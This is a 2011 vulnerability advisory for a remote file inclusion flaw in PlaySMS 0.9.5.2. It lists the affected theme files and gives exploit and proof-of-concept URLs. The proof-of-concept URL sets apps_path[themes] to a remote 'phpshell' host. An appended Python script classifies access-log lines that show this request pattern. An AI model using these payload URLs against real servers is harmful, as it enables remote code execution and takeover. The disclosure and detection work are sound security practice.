PlaySMS 0.9.5.2 Remote File Inclusion

2011.09.07
Credit: NoGe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=============================================================================================================
[o] PlaySMS <= Remote File Inclusion Vulnerability

    Software : PlaySMS ver 0.9.5.2
    Vendor   : http://playsms.org/
    Author   : NoGe
    Contact  : noge[dot]code[at]gmail[dot]com
    Blog     : http://evilc0de.blogspot.com/
=============================================================================================================
[o] Vulnerability

    <?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>

    All of these files are affected:

    web/plugin/themes/default/page_forgot.php
    web/plugin/themes/default/page_login.php
    web/plugin/themes/default/page_noaccess.php
    web/plugin/themes/default/page_register.php
    web/plugin/themes/km2/page_noaccess.php
    web/plugin/themes/work2/page_forgot.php
    web/plugin/themes/work2/page_login.php
    web/plugin/themes/work2/page_noaccess.php
    web/plugin/themes/work2/page_register.php

[o] Exploit

    http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]

[o] PoC

    http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?
=============================================================================================================
[o] Greetz

    Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe kaka11 matthews wishnusakti
    inc0mp13te martfella pizzyroot Genex H312Y noname tukulesto }^-^{
=============================================================================================================
[o] September 05 2011 - Papua, Indonesia
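
Detection logic for the request pattern shown under Exploit and PoC, added here as an example and not part of the original advisory: it classifies access-log lines that request the listed theme templates directly or try to set the variables used in the include. The log lines, the /playsms/ prefix and the example.invalid host are constructed, and themes_module is watched on the assumption that it can be overridden the same way as apps_path.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log lines (combined-log style); prefix and hosts are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Sep/2011:10:00:00 +0000] "GET /playsms/index.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [05/Sep/2011:10:00:05 +0000] "GET /playsms/web/plugin/themes/default/page_login.php HTTP/1.1" 200 300',
    '198.51.100.7 - - [05/Sep/2011:10:01:00 +0000] "GET /playsms/web/plugin/themes/work2/page_forgot.php?apps_path%5Bthemes%5D=http://example.invalid/x? HTTP/1.1" 200 0',
    '198.51.100.7 - - [05/Sep/2011:10:01:09 +0000] "GET /playsms/web/plugin/themes/km2/page_noaccess.php?apps_path[themes]=../../x HTTP/1.1" 200 0',
]

# Theme templates are meant to be included by the application, not requested directly.
THEME_PAGE = re.compile(r"/web/plugin/themes/[^/]+/page_\w+\.php$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a scheme or wrapper name ("http:", "ftp:", ...) or "//".
REMOTE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:|//)", re.I)
# Variables used in the include; themes_module is covered as an assumption.
WATCHED = {"apps_path", "themes_module"}

def classify(line):
    """Return None, 'direct-access', 'override' or 'remote-include' for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    try:
        url = urlsplit(m.group(1))
    except ValueError:          # malformed target, nothing to classify
        return None
    if not THEME_PAGE.search(unquote(url.path)):
        return None
    verdict = "direct-access"
    # parse_qsl percent-decodes names, so apps_path%5Bthemes%5D is caught too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.split("[", 1)[0] in WATCHED:
            if REMOTE.match(value):
                return "remote-include"
            verdict = "override"
    return verdict

def scan(lines):
    """Return (verdict, line) for every line that touches a theme template."""
    return [(v, l) for l in lines if (v := classify(l)) is not None]

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG):
        print(f"{verdict:15} {line}")
```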

